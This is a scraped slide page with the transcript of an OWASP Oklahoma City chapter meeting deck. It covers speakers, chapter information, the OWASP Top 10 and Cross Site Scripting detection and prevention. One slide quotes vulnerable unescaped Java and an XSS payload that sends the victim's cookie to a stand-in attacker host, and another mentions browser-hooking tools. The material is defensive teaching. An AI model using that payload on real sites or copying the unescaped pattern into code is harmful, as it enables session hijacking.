00:00

OWASP Oklahoma City Chapter - Enhancing Software Security

The OWASP Oklahoma City Chapter features experts like Joe Sullivan, Jim Thavisouk, and Stacy Dunn who are dedicated to improving software security. They focus on web application security, offer valuable resources like the OWASP Top 10, and provide a platform for knowledge sharing and networking. Join their events, learn about common security risks like Cross Site Scripting, and contribute to the global mission of enhancing software security.

lahora
Download Presentation

OWASP Oklahoma City Chapter - Enhancing Software Security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Oklahoma City

  2. Welcome! Welcome! • Thanks to our sponsors! • OWASP • RCB Bank • Crossroads Information Security

  3. Joe Sullivan Joe Sullivan • Started in Infosec with a web hosting company in 1999 • Started one of the first outsourced support companies for web hosting servers in 2000 • Worked for an ecommerce company for 10 years in network security • Currently CISO for RCB Bank • 1 to 1 Risk Control & Investigations – Owner/Lead Investigator • Consulting for Crossroads Information Security • SANS Mentor SEC504 Hacker Tools, Techniques, Exploits, and Incident Handling

  4. Jim Jim Thavisouk Thavisouk • Jim Thavisouk is currently working at GitLab as their Senior Security Automation Engineer . • He has been working closely with automating security in the cloud for the past two years. Before GitLab, he worked with various government agencies, including Department of Defense and Department of Energy, where he focused on vulnerability research against a variety of technologies. • Jim also holds a Master's Degree in Computer Science from the University of Tulsa's Cyber Corp program.

  5. Stacy Dunn Stacy Dunn • OWASP Oklahoma City Chapter Leader • Information Security Analyst RCB Bank • Board Member of Super! BitCon, a local gaming convention. • Curator and Founder at Oklahoma Artcade. • Super nerd.

  6. Contact Information • Joe Sullivan: joe.sullivan@owasp.org • Jim Thavisouk: jim.thavisouk@owasp.org • Stacy Dunn: stacy.dunn@owasp.org

  7. Oklahoma City Chapter Oklahoma City Chapter • The official page is at: https://www.owasp.org/index.php/Oklahoma_City • Twitter: @okcowasp • FaceBook • YouTube • MeetUp: https://www.meetup.com/Oklahoma-City-Chapter- Meetup/ • https://owasp.herokuapp.com/ <- Join us on Slack!

  8. OWASP OWASP • The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions. OWASP is in a unique position to provide impartial, practical information about AppSec to individuals, corporations, universities, government agencies and other organizations worldwide. Operating as a community of like-minded professionals, OWASP issues software tools and knowledge-based documentation on application security.

  9. OWASP Top 10 • The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. • We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.

  10. OWASP Top 10 2017

  11. Membership Membership • Individual Members support OWASP at the $50 USD* level annually. There is also a 2 year membership for $95 USD* and Lifetime membership for $500 USD*. To find out more about Individual Membership, please visit the Individual Member page. • Membership is optional • Meetings are open to everyone • Guests are welcome • Memberships help fund our chapter

  12. Meetings Meetings • Web Application Security • Web Application Development • Presentations • Labs • Networking • Round Tables • Food

  13. The Future The Future • Conferences (IWS Coming Up) • Speakers • Presentations • News • Challenge Coins • Promo Materials • Volunteers are welcome!

  14. Speaking of Presentations Speaking of Presentations • Cross Site Scripting • XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications • Better described as a code reflection attack • How this works is an attacker crafts a URL with a script in it​ • The script in the URL is sent to the server as input​ • When the user accesses the URL the server reflects back the script contained in the URL​ • The user’s browser processes the script and performs whatever action the script was set to run

  15. Cross Site Scripting Attack Scenario • HTML without validation or escaping: (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>"; • Attacker modifies the CC parameter to: '><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'. • This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.

  16. More Cross Site Scripting Attacks • Port scanning your internal network using XSS attacks (https://www.symantec.com/connect/blogs/getting-sassy-xss-part-3-port-scanning) • Attacking log viewers and user interfaces with XSS • Using the Browser Exploitation Framework (BEEF) to attack browsers https://www.cybrary.it/0p3n/tutorial-xss-exploitation-beef/ • Using XSS we can steal cookies, scan networks, hook into browsers and do a lot more • Good for getting a foothold on a network

  17. Detecting Cross Site Scripting Attacks • This is a noisy attack • Generates logs • SIEM can detect attacks, but may miss obfuscation techniques • IPS can alert to XSS attacks • IDS can alert to XSS attacks • Web application firewall

  18. Preventing Cross Site Scripting • Filter out meta characters from requests – do this one the server side, and not the client side • Microsoft offers a free anti-XSS library • Using frameworks that automatically escape XSS by design, such as the latest Ruby on Rails, React JS. Learn the limitations of each framework's XSS protection and appropriately handle the use cases which are not covered. • Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities. The OWASP Cheat Sheet 'XSS Prevention' has details on the required data escaping techniques.

  19. Preventing Cross Site Scripting • Web application penetration tests regularly • Test when changes are implemented to the web application • Test when new attacks come out • Work with your web application developer on testing and remediation

  20. Discussion Discussion • What would you like to get out of our meetings? • Web Application Security • Vulnerability Testing and Remediation • Development • Security Operations • Penetration Testing • Incident Response • Defending Web Applications • Defending Web Applications • What would you like to get out of our meetings? • Web Application Security • Vulnerability Testing and Remediation • Development • Security Operations • Penetration Testing • Incident Response

More Related